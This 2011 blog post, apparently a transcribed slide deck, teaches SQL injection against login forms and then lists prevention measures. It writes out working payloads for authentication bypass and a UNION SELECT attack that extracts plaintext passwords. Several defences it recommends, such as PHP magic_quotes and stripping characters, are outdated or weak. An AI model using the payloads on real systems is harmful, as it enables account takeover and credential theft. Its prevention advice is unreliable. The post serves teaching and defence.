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Friday, July 15, 2011
SQL Injection
SQL Injection
Exploitation and Prevention
Ralfe Poisson http://www.ralfepoisson.comhttp://www.ralfepoisson.com/hacks/sql_inject.php
Demo Website ....... Hack AwayWhat is an SQL Injection ?
SQL injection is a technique employed to
manipulate a legitimate database query in
order to return falsified data.Example
Standard login form
To authenticate against this form, a programmer might do
something like :
SELECT * FROM `users` WHERE `user` = 'someusername'
AND `pass` = 'somepassword'But .....
What would happen if somepassword or
someusername happen to be something other than
a
username and password which we were expecting?
What if, for instance, they happen to be SQL
commands?The Beginning of the End
What if we enter the following into
the form:
Username : anything
Password : ' OR 1=1 #
The resulting SQL would be:
SELECT * FROM `users`
WHERE `user` = 'anything'
AND `pass` = '' OR 1=1 #';So what would that do?
With the resulting SQL ...
We are retrieving all the information from the users table where
1=1, in other words, EVERYTHING.
We would effectively become the first user in the table.
That is quite scary.Admin Access .......... not good
Now, what would happen if
the following login details
were used?
Username : admin' #
Password : _
The resulting SQL would be:
SELECT * FROM `users`
WHERE `user` = 'admin' #';It Gets Much Much Worse
Retrieving Plaintext Passwords
Step 1 : Find the table with the login details
Username : admin
Password : ' UNION
SELECT CONVERT (table_name USING latin1)
FROM INFORMATION_SCHEMA.TABLES
WHERE table_name LIKE 'u%'
AND NOT table_name = 'USER_PRIVILEDGESIt Gets Much Much Worse ......
The resulting SQL is :
SELECT * FROM `users`
WHERE `user` = 'admin' AND `password` = ''
UNION
SELECT CONVERT (table_name USING latin1)
FROM INFORMATION_SCHEMA.TABLES
WHERE table_name LIKE 'u%' AND NOT table_name =
'USER_PRIVILEDGES'.
From the output we can determine the table with the login data.It Gets Much Much Worse ........
Step 2 : Get the Password
Username : admin'
Password : ' UNION SELECT
CONCAT(`user`, '=', `pass`)
FROM `users`
WHERE `user` = 'adminIt Gets Much Much Worse .......
The Resulting SQL is :
SELECT * FROM `users`
WHERE `user` = 'admin' AND `password` = ''
UNION
SELECT CONCAT (`user`, '=', `pass`)
FROM `users`
WHERE `user` = 'admin'.
We then will see something like this on the landing page:
" Welcome admin=AdminPassword "So How Do We Prevent This?
# 1 : Escape Received Strings
Properly escape the strings we receive from the users.
Alternatively, we could strip out characters we know we
shouldn't be receiving, such as quotation marks, semi-colons
etc...So How Do We Prevent This?
# 2 : Password Hash Codes
Store hash codes only for passwords. Thus, the plaintext
password is never used or stored or compared within an SQL
query. In the script (perhaps the PHP script), you would
generate a hash of the password entered by the user, and
compare the resulting hash to the hash stored in the database.
If the hash codes match, then authentication has occured, if
not, then the passwords do not match, and the user should not
have access to further information. This will negate the
possibility of the above hack for retrieving passwords.So How Do We Prevent This?
# 3 : Database Specific User Priviledges
From the webapp, only access the database with a user with
database-specific priviledges. You do not want to be using the
root user account to be accessing the database. If you are
foolish enough to do this, you are opening yourself up for
someone to either wipe out your entire database server, or
retrieve every single scrap of data on your SQL server....
NOT GOOD.So How Do We Prevent This?
#4 : Turn on Magic-Quotes
For system administrators, simply by turning on the
magic_quotes flag in the php.ini file will automatically escape
any suspicious quotation or apostrophe marks.References
Cumming, A. and Russel, G, 2007.
"SQL Hacks: Tips & Tools for Digging into Your Data"
SecuriTeam - SQL Injection Walkthrough
http://www.securiteam.com/securityreviews/5DP0N1P76E.htmlTHE END
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